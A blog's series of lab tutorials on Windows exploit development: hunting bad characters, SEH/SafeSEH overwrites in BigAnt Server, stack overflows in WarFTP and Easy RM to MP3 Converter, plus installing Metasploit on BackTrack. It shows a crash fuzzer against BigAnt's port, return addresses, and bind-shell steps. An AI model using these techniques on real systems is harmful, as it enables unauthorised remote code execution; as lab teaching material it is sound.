Bad Character

Bad character usually can cause a variety of effects on the exploits we sent. Sometimes making a function to be failing, or activities that are not expected, even derail the process of exploitation, such as is happening on BigAnt SEH exploit case.

After we generate payload with defined bad character that are 0x00 0x0a and 0x0d, we found the code like this,

 the result on SEH handler view,

this view is unexpected result, because the result should be 

To find out which characters are included in the bad character, requires trial and error process. The method that will be used is, by trying to send a data packet payload dummies into the memory, then studied at the byte which has an error reading SEH address. Dummies character that is sent in the form of opcode from \x01 to \xFF, which represents all the opcode on the processor. To make easier we can use generatecodes.pl script

Here are the script :

#!/usr/bin/perl
# generatecodes.pl
# Version 0.1

use Getopt::Long;

GetOptions('help' => \$help);

if ($help) {&help; }

if ($ARGV[0]) {
 @knownbad = split ',', $ARGV[0];
 foreach $bad (@knownbad) {
  $bad = hex($bad);
 }
}

if (! $ARGV[1]) {
 $split = 15; # split at 15 characters if not told otherwise
} else {
 $split = $ARGV[1];
}

$count=0;
for ($a = 0; $a <= 255; $a++) {
 $match = 0;
 foreach $knownbad (@knownbad) {
  if ($knownbad eq $a) {$match = 1} 
 }
 if (! $match) { 
  if (! $count) {print chr(34); }
  print '\x' . sprintf("%02x", $a); 
  $count++;
 }
 
 if ( (int($count/$split) eq $count/$split ) && ($count)) {print chr(34) . "\n"; $count = 0; }
}

if ( (int($count/$split) ne $count/$split ) && ($count)) {print chr(34) . "\n";}


sub help{
 print "This script generates a c style buffer of all characters from 0 to 255, except those specified in a comma seperated list provided as parameter one.  Used to generate a list of characters to enter into a exploit to test for bad characters. \n\n" .
 "Parameter one is optional and should contain comma separated hexadecimal bytes in the format 00,0a,0d and any characters provided will not be listed in the output.\n\n" .
 "Parameter two is also optional and specifies the interval at which new lines are interspersed in the output.  If not specified the default is a new line every 15 characters.\n\n";
 exit;
}

  

Then run the script,

After this, the next step was to enter the script into the fuzzer, but this time, the script inserted line-by line. The purpose inserted the script as per line is to know what character (from \ x00 to \ xFF) that can make the memory system becomes chaos.

 The result is direct into vbajet32.dll, it means there are no bad character in the first line. Then we try 2nd line...

"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"

 and the result is the address back again to 90909090, it means there are at least 1 bad character on the 2nd line. We can search again by split the line into 2 section and test again the fuzzer until we know the bad character. OK...after more than 10 times try fuzzing and checking per-line, we can look at the result below :

So from the manually way put the dummies line per line and test it on our fuzzer..we can make conclusion that bad character on this case are 0x00, 0x0a, 0x0d, 0x20.

Exploitation Applications with SEH and SafeSEH

This time we try to discuss about aplication exploitation with SEH and SafeSEH. One of the aplications that use SEH protection is BigAnt, so we can use it to try on our LAB. As usual as before, we must prepare our tools there are :

1. Ollydbg

2. Python

3. Bigant

4. LAB (Win XP SP3)

No we come to the steps...

1. Prepare on LAB

Run BigAnt Server on our LAB and also run Ollydbg, then attach AntServer process.

2. Fuzzing

Create a fuzzer using python language, in this case we can use "USV " command owned by BigAnt Server.

here are the codes :

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

the codes means we sent 2500 byte buffer to BigAnt Server that use port:6660. Then run it, and we can see the result on Ollydbg

picture above showed us how BigAnt crashe, but EIP register not overwrited, its happen because BigAnt use SEH. If we want to know the error we can view SEH chain

to continue data from SEH chain into memory we can press Shift+F9. 

now we can see EIP register overwrited by 0x41414141.

3. Pop, Pop, Retn method

Explanation about POP,POP,RETN method and why we use that method can we read from a book named "Harmless Hacking" by our lecturer Mr. MRP. in this post we dont discuss it and we can through it.

Next, using third party dll file name vbajet32.dll as a springboard to overwrite SEH protection. We can find POP,POP,RETN command from vbajet32.dll module in the ollydbg.

From Ollydbg -> View -> Execute Modules -> attach vbajet32.dll process. Next Right click on the mouse and search for -> sequence of commands -> write POP r32,POP r32, RETN. Finally we can see the address of vbajet32.dll

4. Create and Offset pattern

Same as step to exploit WarFTP, the next step is creating pattern and copy the pattern to the fuzzer and then run the fuzzer

now we know how much bytes data we must sent into target from the result of the offset.

Next step, still on the same fuzzer we make change on it like this :

then run the fuzzer again. The result should be BigAnt crashed and access violation on memory occured that we can see in SEH handler.

5. CPU process controll

After we get the address byte to drag out SEH, now its time to put address of vbajet32.dll who have command POP, POP RETN into fuzzer. the codes look like, 

  

Restart Ollydbg dan BigAnt server, put a breakpoint into 0F9A196A memory address inside vbajet32.dll module. After it run the fuzzer.

Now we can see from SEH handler this change,

To direct the CPU process from 4 bytes into the empty space, followed by the command SEH overwrite address, we can use JMP SHORT command.So we can write 6 byte opcode value into fuzzer, and its the change come ike this:

6. Generate sheelcode

We can use msfweb as like as way to exploit warftp, the most important things is we must pay attention to "BAD characters" ,i will post the way to find Bad char in different post. 

Next, we can copy the codes generated by the payload and add 16 byte nop padding before the codes to the fuzzer.

 The last step is run the fuzzer on target and then try to connect to the system.

Finally done...

 

 

Non SEH Vulnerability Development II (Local)

In my last post about Non SEH VD using remote shellcode, we were use warFTP aplication for the target. Now we try using Easy RM to Mp3 Converter to try local shellcode target. 

Preparation we should use basicly same as before, now we can continue to the steps.

1. Fuzzing

create fuzzer to generate the file that can crash (buffer overflow) Easy RM (ERM) using python.

run fuzzer, and the result should be a file name coba.m3u (mp3 playlist). Run coba.m3u to Easy RM at the LAB, what happens next is ERM will crash and suddenly close.

2. Debugger
check in the Ollydbg, and make sure that EIP register overwrite by 0x41414141

 3. Byte position using MSF
run pattern_create tool using command

root@bt:/opt/metasploit-4.3.0/msf3/tools# ./pattern_create.rb 26100 > erm.txt

and copy the code into fuzzer

ollydbg showed

run pattern_offset tool

and edit fuzzer :

and after running on ERM it showed:

4. JMP ESP
find JMP ESP command address on shell32.dll and then set the fuzzer :

after breakpoint, ollydbg showed :

5. Generate payload and add the NopsLED
use the same payload method (bind shell) for windows and generate payload codes, then copy the codes to fuzzer

running fuzzer then run the last coba.m3u on Easy RM converter without ollydbg.Last step is connect to target IP using pot 4444, and the result should be :

...and done Happy trying ^^...

Non SEH Vulnerability Development

Today we try to learn about Non SEH or most people said buffer overflow vulnerability development. The aplication that used for target is WarFTP running on Windows XP SP3.

Tools we used to prepared :

1. WarFTP 1.65

2. Lab (Windows XP SP3 running on virtual Box)

3. Ollydbg

4. Python

Steps : 

1. Fuzzing

     Fuzzing is the early step that will we do to find any vulnerabilities that      can be exploited in applications. So now we try to make a simple fuzzer which can transmit data to the FTP protocol (remote) using Python programming language.

 2. Connect with the target

Don't forget to running warFTP on your virtual box, because its our aplication target LOL...

after it, we can run fuzzer on the target using command, 

root@bt:~# python fuzzer.py

then warFTP on the LAB should be dissapear or error. it means our fuzzer works.

3. Debugger 

 The next step is to look in the aplication system memory using Ollydbg. Run WarFTP through Ollydbg

 

 

then run again fuzzer and look the different at the CPU register,

we can see all of the CPU register affected by AAAA... or 0x41414141from the fuzzer we sent. With stacked values ​​in the EIP register, will bring an opportunity for an attacker to control the EIP register values ​​and change them as necessary.

4. Fuzzer byte position using Metasploit Framework
 Usually we used pattern_create tool to make some character replacing "A" characters that sent to the aplication.

root@bt:/opt/metasploit-4.3.0/msf3/tools# ./pattern_create.rb 1000 > string_pattern.txt

copy the code from string_pattern.txt and change fuzzer, 

 

run again the fuzzer on aplication then look at the ollydbg showed,

.

 see the ESP and EIP number, and then find the byte position using pattern_offset tool

it wil return 485 for EIP offset and 493 for ESP offset, it proof that we need 4 byte to overwrite EIP register. Next we will overwrite EIP register using DEADBEEF register.

run fuzzer again,

now EIP register overwrite by DEADBEEF address

5. JMP ESP

Next strategy is using JMP ESP. JMP ESP is command that used by an application to read the data in the buffer, so the value of the EIP register will point to the memory address where it is contains JMP ESP command. What we have to do now is find the JMP ESP command in Shell32.dll file using ollydbg.

 change DEADBEEF memory address to JMP ESP address 7C9D30F3 on the fuzzer. and run again the fuzzer, so it will look like this

6. Generate payload

Run from the console these command,

run browser,

generate payload from the browser and copy the code into the fuzzer. so the latest fuzzer looks like, 

 and run again warFTP without ollydbg and then run fuzzer.

 after we connect using netcat to target IP and port 4444 we've done penetrate system. ^^

 

Installing Metasploit Community Edition on BackTrack 5 R1

BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available, not the stable trunk (read about the difference). This post tells you how you can update your version of BackTrack5 to Metasploit Community, including both the stable and the dev trunk of Metasploit Framework. If you want to use Metasploit Express or Metasploit Pro on BackTrack5, follow the same instructions and enter your product key at the end to activate your commercial Metasploit edition.

Installing Metasploit Community over the existing Metasploit Framework installation won't work for several reasons, one being a conflict with the postgres database. The best way is to start by uninstalling Metasploit Framework v3 first. After logging on to BT5 (user: root / password: toor), use the following command to uninstall the software:

/opt/framework/uninstall

After the uninstall has completed, enter the BacktTrack GUI with the following command:

startx

Open Firefox (menu Applications / Internet / Firefox Web Browser), go to http://metasploit.com/download and download the Linux installer. When the download has completed, open a terminal window and enter the following commands:

chmod u+x /root/metasploit-latest-linux-installer.run

./metasploit-latest-linux-installer.run

At the end of the installer, the Metasploit Web UI opens in Firefox (hint: it's opened behind your terminal window). Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception. 

By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost. 

Enter a username and password, and click Create Account. Click on Register your Metasploit license here!

Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on Rapid7.com, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license.

1. Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
2. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
3. Enter your email address and hit Go.
4. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
5. Hit Go again.
6. You'll see a redirect warning that starts with "Request". Simply ignore it.
7. Close the tab. You should now be back in the Metasploit Web UI 

 

 

Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:

 

 The BackTrack folks just published that you can now get the new unifed Metasploit installer with a dist-upgrade operation or through apt-get. The open source Metasploit trunk is still present under /opt/metasploit/msf3/.

Done .... Good luck and try

"The more quiter you are, the more you are able to hear"